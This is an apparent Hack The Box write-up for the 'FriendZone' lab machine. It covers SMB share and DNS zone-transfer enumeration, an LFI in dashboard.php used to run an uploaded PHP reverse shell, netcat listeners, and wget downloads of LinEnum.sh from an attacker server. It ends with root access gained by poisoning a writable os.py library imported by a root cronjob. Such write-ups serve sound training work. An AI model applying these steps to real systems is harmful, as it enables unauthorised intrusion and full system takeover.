HacktheBox - FriendZone Writeup

13/07/2019

Initial Enumeration 

1. Nmap Scan

Lets start with a scan of the target ip address:

nmap -sV -oA nmap/initial.tcp 10.10.10.123

From the scan, we can see that there is an FTP server, after running an nmap scan with -sC we know it is not allowing anonymous connections, Port 80 and 443 are open indication a web server, possible shares via SMB and to no surprise given the name of the box, Port 53 is open... DNS Zone Transfers? ;) 

2. Web Server Enumeration - Port 80/443 

As always, lets get gobuster running whilst we check out the webpages: 

gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u https://10.10.10.123

Nothing of interest found from the gobuster scan

https://10.10.10.123 Main webpage: 

As you can see, it has an email address of 'info@friendzoneportal.red' - As with other boxes, the domain syntax is normally the name_of_the_box.htb but this time lets change .htb to .red - Lets enter the domain names into our /etc/hosts file 

 nano /etc/hosts                                                                                                       10.10.10.123     friendzoneportal.red friendzone.red

Browse to https://friendzone.red: 

Source code comment: 

As you can see, our first indication of a possible rabbit hole... or is it?                    Lets run another gobuster, this time on https://friendzone.red:

gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u https://friendzone.red

We find the following directories: /admin, /js/js and a file: /js/js/index.php 

We see that there is a /js/js directory.. maybe this is what they meant by 'dont go too deep'? 

Ah.. More cryptic messages! 

3. SMB Enumeration 

We find port 445 open, lets have a look and see if we have access to any shares: 

smbmap -H 10.10.10.123 

As you can see we had access to two shares, General (Read Only Access) and Develpoment (Read/Write Access) .. This will be important later!

Lets mount the shares and view the contents: 

sudo mount.cifs //10.10.10.123/general /mnt user=,pass= 

The share contains a single file, creds.txt .. And you guessed it, it containted credentials! 

sudo mount.cifs //10.10.10.123/general /mnt/friendzone/Development user=,pass=  

The Development share doesnt contain anything... Yet

4. DNS Enumeration - Zone Transfer

From the name of the box, I'm assuming that DNS zone transfer is enabled...            (oh no!) Lets confirm DNS zone transfer:

dig axfr friendzone.red @friendzone.red                                                                              dig axfr friendzoneportal.red @friendzone.red

5. Enumerate new domains: 

Lets add the new domains into our /etc/hosts file: 

As you can see, there are plenty of domains, but we will focus on two, 'administrator1.friendzone.red' and 'uploads.friendzone.red' 

Lets start with uploads.friendzone.red: 

We see the option to upload an image file, lets try and upload a php reverse shell in burp and change the content type to 'img/png':

Oh.. We get this message:

Rabbit hole? l think so... 

Okay, lets check out administrator1.friendzone.red:

So this is what the creds.txt file was for! Use the creds to login...

immediately we get an indictation we are on the right track, with the hint of dealing with a beginner php dev and the application not being tested yet.             The dashboard.php files 'pagename=' parameter is unsanitized and adds '.php' at the end of any input in the 'pagename=' parameter, This is the vulnerable piece of the decoded dashboard.php code:

include($_GET["pagename"].".php");

Lets test for LFI by running a php file from another subdomain, 'uploads.friendzone.red': 

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=../uploads/upload

Exploitation - User

6. Exploiting LFI in dashboard.php: 

Now that we know there is LFI in the 'pagename=' parameter in dashboard.php, lets put the Read+Write access to the Development share to good use and upload a php reverse shell to the share

Start a netcat listener:

nc -lvnp 9001 

Right, now we have uploaded our reverse shell, and started a netcat listener.. its time to execute our payload via the LFI: 

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=../../../../../../../../etc/Development/php-reverse-shell 

We should now have a connection to our netcat listener.. 

Lets make the shell fully interactive:

 python -c 'import pty;pty.spawn("/bin/bash");'                                                                   stty raw -echo                                                                                                                               fg

We have a shell as www-data on friendzone! 

whoami&&id&&hostname

Get the user.txt flag:

After a bit of searching around for interesting files, i looked in the /var/www directory and found the file 'mysql_data.conf' ... it contained database credentials: 

These creds work for SSH, so lets log in with them there to get a stable shell. 

We are now running as the user, Friend. 

Privilege Escalation 

7. Use Priv Esc Scripts:

I like to start my Priv Esc by running automated enumeration tools like LinEnum.sh:

Start a SimpleHTTPserver on our attacker machine in the directory that has LinEnum.sh in it:

python -m SimpleHTTPServer 80

On the friendzone machine, download LinEnum.sh and make it executable: 

wget https://<attackerIP>/LinEnum.sh                                                                                    chmod +x LinEnum.sh 

Start LinEnum.sh: 

./LinEnum.sh -t

Ah-ha. As a low-priv user, we have modify and execute permissions on anything inside the python library

Another tool I like to use is pspy, it monitors linux processes without needing root permissions. Download it from our machine in the same way as LinEnum.sh, we need the pspy64 version:

Start pspy64: 

./pspy64  

We find a cronjob running a script, 'reporter.py' as root, lets look at the script code:

8. Exploit the reporter.py script and cronjob:

'reporter.py' imports the 'os.py' script, remember we have modify and execute permissions on the 'os.py' script, this means we can posion the library, specifically the 'os.py' script and add a command we want root to run with the instruction, system(<command>) .. what about a netcat reverse shell? 

Start a netcat listener:

nc -lvnp 9002 

Execute the reporter.py script:

We should now have a connection on our netcat listener as root! 

Lets make the shell fully interactive:

 python -c 'import pty;pty.spawn("/bin/bash");'                                                                   stty raw -echo                                                                                                                               fg

We have a shell as root on FriendZone!

whoami&&id&&hostname

Get the root.txt flag: